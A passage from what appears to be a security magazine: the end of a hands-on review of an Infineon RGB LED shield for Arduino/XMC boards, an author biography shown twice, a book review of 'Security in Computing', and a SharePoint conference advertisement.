addon boards that seem to have forgotten that electricity likes to move through metal parts. It’s always fun to see some sparks but never from your own device or your dog. The XMC doesn’t have any switches for power or reset. This isn’t a big problem since you can program which conditions turn on the board and which ones shut it down. Remember that the LEDs will need their own power source. The board says it can provide the power at 5Vs but unless you plug in a power supply running at 1.5 Amps, get your own power for the LEDs. It’s just easier that way. Unless you want to add on some capacitors, charge- zap, charge- zap. You get the idea. 92 NeXpose and Metasploit Pro Hacking I did run into another small problem, I don’t have tiny hands. I know these are microcomputers. I know they are supposed to be small but do they really have to make connectors that small? I had to use a magnifying glass just to insert the wire leads. A big magnifying glass and a big flashlight, even though the board puts off its own light with the red color. Luckily, the manufacturer understands that some of us have normal sized hands. For that, they made the wire connections with nice plastic screw tighteners. These little screws keep the LED wires from slipping out of the connector that I spent years (not really, a more like few seconds) trying to get in place. They hold the LEDs very secure, considering that they are plastic. I was surprised at how well the connections held the wires, especially since I’m not the most careful person I know. You don’t even want to know what my lab looks like. Imagine Tokyo after Godzilla ate a ton of bean burritos. That’s how bad my lab is organized, so stuff gets tangled up all the time. The Infineon RGB shield was able to survive my lab, my hands, my dog and my endless curiosity. This is a cool add on board for Arduino projects. One thing I wanted to really hack was not using LEDs but hooking up other low power devices and using the board’s signaling capabilities. If I can pulse, blink, and orbit LED lights, what is keeping me from using the same technique to control an IR light or radio signal for a mini radar device? Nothing, just your imagination. That is the best part of hacking, you build whatever you want. About the Author Bob Monroe grew up in Southern California before he joined the U.S. Army in 1985. One of Bob’s first military assignments introduced him to the world of hacking. His prankster ways ended abruptly in 1996 when he was almost caught hacking by an eighty-two year old librarian. This incident led to a renewed interest in cyber security, as a good guy. Since then, he has written several articles for publication and maintains a passion for digital security. Bob holds a Master of Science in Information Assurance from Norwich University. Bob’s specialty is cyber teaching and security awareness training. Along with work for the U.S. Army, he has taught security classes for the Veterans Administration, Military District of Washington, Commandant of the Marine Corp and staff, as well as countless others across the world. He holds a U.S. Patent for airport security automation technology that combines radar and thermal imaging to protect aircraft movement areas and the surrounding airspace. This patent does not impress the TSA folks at all and usually gives them a reason to strip search him instead. Bob works with the Institute for Security and Open Methodologies (ISECOM.org) and Hacker High School as an editor and writer. Both organizations are non-profit, with the mission of teaching computer security methods across a global audience. In his spare time, Bob makes children’s toys in his small woodshop. He still has all nine fingers, too. Oops, make that seven fingers. 93 NeXpose and Metasploit Pro Hacking Security in Computing by Charles P. Pfleeger, Shari Lawrence Pfleeger ad Jonathan Mrgulies Reviewed by Bob Monroe I read and review about 30 books a year on average, plus spend most of my days researching and writing about digital security. I’ve been doing this routine since 1989 so I have a so-so understanding of cyber security. Security in Computing took me by surprise since it looked like the average security 101 book I read way too often. This book is nothing like any security book I’ve read before except a few dissertation pieces I’ve picked up. The 910 page book is filled with heavy research and plenty of great real world examples. One of the first things I noticed was that many of the references were from the 1960s, 70s, 80s and 90s. This tells me that the authors went back to old school style and not just internet searches for content. If you do nothing else, get this book just for the bibliography. It is amazing because it is filled with old ideas that we still haven’t learned in security. From a depth standpoint, this book should be mandatory reading for anyone after they obtain their CISSP. The Pfleegers and Margulies do a great job of presenting deeper understandings of security concepts along with pictures and examples from recent security failures. They stick to the basics of confidentiality, integrity and availability (CIA) but build off of those to show the reader how those concepts extend to a much wider field of study. This is not a classroom textbook, this is a manual on digital security with all the juicy stories that didn’t make the headlines and all the original papers written before blogs existed. You will find exercises at the end of each chapter that are fairly well written but it’s kind of difficult to complete the exercises when your jaw is still on the floor. There is just too much great information in each page not to laugh (or cry) to yourself about how far we haven’t come in this field. Security in Computing is in it’s fifth edition, which just came out a few months into 2015. The ink is still wet but I didn’t see much updated information from the fourth edition. But than again, security hasn’t fixed many mistakes in the two and half decades I’ve been in it so I figure there isn’t much new catastrophes to talk about. Sony is still messing up, that hasn’t changed. Passwords are still weak. Applications are still poorly written. Hardware has bugs at the firmware level. I’m hard pressed to think on anything new to add that isn’t already covered in this huge book. I guess they could have talked about Hillary Clinton and her private email server or Target’s data breach but that would just remind us of other security errors from the past. One of my favorite parts of this book is how each topic is clearly explained but not dumbed-down. I’m not the brightest guy but I do like the author to write at the appropriate level. The diagrams and pictures are helpful if you are really into flow carts. Some are even pretty funny. Across the board, there isn’t a topic that wasn’t covered in this book. Okay, there were some things that could have been added but nothing that would make a big difference to this high quality book. Just to give you an idea of how big the reference material is: there are 27 pages of bibliographic information at the back of the book, all written in fine print. I needed to wear two pair of glasses to read some of those resources. If you are interested in learning a heck of a lot more about our history and future as security professionals, you’ll need this book. You will not pass any certification, get any special initials after your last name, or even earn a promotion for reading this book. However, if you are passionate about this field, I highly suggest you buy this book and read it. Older folks will appreciate the nods to those who taught us. Younger readers will appreciate where we came from before security vendors took over this profession. 94 NeXpose and Metasploit Pro Hacking About the Author Bob Monroe grew up in Southern California before he joined the U.S. Army in 1985. One of Bob’s first military assignments introduced him to the world of hacking. His prankster ways ended abruptly in 1996 when he was almost caught hacking by an eighty-two year old librarian. This incident led to a renewed interest in cyber security, as a good guy. Since then, he has written several articles for publication and maintains a passion for digital security. Bob holds a Master of Science in Information Assurance from Norwich University. Bob’s specialty is cyber teaching and security awareness training. Along with work for the U.S. Army, he has taught security classes for the Veterans Administration, Military District of Washington, Commandant of the Marine Corp and staff, as well as countless others across the world. He holds a U.S. Patent for airport security automation technology that combines radar and thermal imaging to protect aircraft movement areas and the surrounding airspace. This patent does not impress the TSA folks at all and usually gives them a reason to strip search him instead. Bob works with the Institute for Security and Open Methodologies (ISECOM.org) and Hacker High School as an editor and writer. Both organizations are non-profit, with the mission of teaching computer security methods across a global audience. In his spare time, Bob makes children’s toys in his small woodshop. He still has all nine fingers, too. Oops, make that seven fingers. 95 Learn what’s new in SharePoint and Office 365! SharePoint in the Cloud? On Premises? Or Both? Come to SPTechCon Boston 2015 and learn about the differences between Office 365, cloud-hosted SharePoint, on-premises SharePoint, and hybrid solutions and build your company's SharePoint Roadmap! August 24 -27, 2015 BOSTON Over 70 classes taught by expert speakers! “This was a great conference that addresses all levels, roles and abilities. Great variety of classes, great presenters, and I learned many practical things that I can take back and start implementing next week.” —Kathy Mincey, Collaboration Specialist, FHI 360 Looking for SharePoint 2013 training? Check out these targeted classes! • Custom SharePoint 2013 Workflows that Use the SharePoint 2013 REST API • SharePoint 2013 Farm Architecture and Visual Studio for Admin • Creating a Branded Site in SharePoint 2013 • SharePoint's New Swiss Army Knife: The Content Search Web Part Moving to Office 365? Here are some targeted classes for YOU! • • • • Baby-Stepping Into the Cloud with Hybrid Workloads Demystifying Office 365 Administration Document Management and Records Management for Office 365 Office 365 Search in the Cloud MASTER THE PRESENT, PLAN FOR THE FUTURE! REGISTER NOW! A BZ Media Event SPTechCon™ is a trademark of BZ Media LLC. SharePoint® is a registered trademark of Microsoft. www.sptechcon.com